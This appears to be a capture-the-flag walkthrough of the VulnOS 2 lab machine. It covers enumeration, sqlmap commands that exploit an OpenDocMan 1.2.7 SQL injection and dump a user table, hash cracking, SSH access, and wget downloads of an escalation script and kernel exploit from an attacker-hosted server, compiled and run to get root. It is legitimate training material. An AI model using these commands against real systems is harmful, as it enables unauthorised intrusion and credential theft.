VulnOS 2

VulnOS 2 a vulnerable machine found on the NetSecFocus Trophy Room list which I have been using as preparation for the OSCP. Below is a walkthrough to compromise this machine.

First, after downloading and importing the machine into VMware, I had to figure out the IP address of the machine. I used netdiscover -i eth0 until I came across the IP of this machine.

VulnOS 2 netdiscover

After uncovering the IP address, I ran threader3000 and let it run its suggested nmap scan.

VulnOS 2 threader 3000 nmap

It appears that SSH, Apache, and IRC are open on this server. Let’s take a look at the website.

VulnOS 2 website

Let’s follow the link on the site and it will pull up the website shown below.

VulnOS 2 JABC website

Next, I ran gobuster dir -u http://[machine ip]/jabc/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x .txt,.php -t 50 to enumerate the website.

VulnOS 2 gobuster

VulnOS 2 robots.txt

Next, I looked at the robots.txt file, which has a wide number of disallowed entries (that turn out to be rabbit holes). After looking through this, I turned to the main Documentation page, which appeared blank, but upon selecting it all, it shows a directory (/jabcd0cs/) that we can navigate to and provides user credentials of guest/guest.

VulnOS2 Documentation webpage

This brings up a site for a web application named OpenDocMan which is running version 1.2.7.

VulnOS 2 OpenDocMan 1.2.7

I logged in with the credentials provided (guest/guest). I reviewed the files shown below but nothing of interest came out of them.

VulnOS 2 OpenDocMan guest login

At this point, I decided to look for exploits, I used searchsploit OpenDocMan 1.2.7 from my attacker PC which returned a result.

VulnOS 2 searchsploit

Upon reviewing the text file (with searchsploit -x 32075), it appears that OpenDocMan has a SQL injection vulnerability. I ran sqlmap –url “http://[machine ip]/jabcd0cs/ajax_udf.php?q=1&add_value=odmuser” –dbs –level 5 –risk3* to enumerate the databases with sqlmap.

VulnOS 2 sqlmap 1

Next, I decided to enumerate the tables on the jabcd0cs table. I did this with sqlmap with sqlmap –url “http://[machine ip]/jabcd0cs/ajax_udf.php?q=1&add_value=odmuser” -D jabcd0cs –tables –level 5 –risk3*.

VulnOS 2 sqlmap 2

A few potential tables of interest came up. I decided to look at the odm_user table with sqlmap –url “http://[machine ip]/jabcd0cs/ajax_udf.php?q=1&add_value=odmuser” -D jabcd0cs -T odm_user –dump –level 5 –risk3*, which dumped its contents. It uncovered a password hash as indicated below.

VulnOS 2 sqlmap 3

A quick Google search mentioned that this is likely an MD5 hash. I went to to decrypt this hash. This returned a value of webmin1980 for the password.

VulnOS 2 crack hash

I then tried to SSH in as the webmin user (uncovered in the sqlmap query above) and with the password of webmin1980. I was successful with connecting via SSH.

VulnOS 2 ssh webmin

I decided to enumerate this server, in order to do so, I needed to serve up an HTTP server from my attacker pc with python3 -m http.server.

VulnOS2 python3 http server

Next, from the initial foothold, I ran cd /tmp to go to the temporary directory, wget http://[attacker ip]:8000/ and finally chmod +x to make this script executable.

VulnOS 2 wget chmod

I next ran ./ and it returns that the Linux version is likely exploitable and can be utilized for privilege escalation.

VulnOS 2 linpeas results

Running searchsploit 3.13.0 from our attacker PC returns a couple of results. The first one is a program that can be compiled. Let’s copy it to our current directory on our attacker PC with searchsploit -m 37292.

VulnOS 2 searchsploit 37292

Next, from our victim pc, let’s run wget http://[attacker ip]:8000/37292.c followed by gcc -o 37292 37292.c to compile the program.

VulnOS 2 wget gcc

After compiling the program, I ran ./37292 which gave us a root shell. I then ran cd /root followed by ls to list the directory contents followed by cat flag.txt to get the flag for this box.

VulnOS 2 run exploit root shell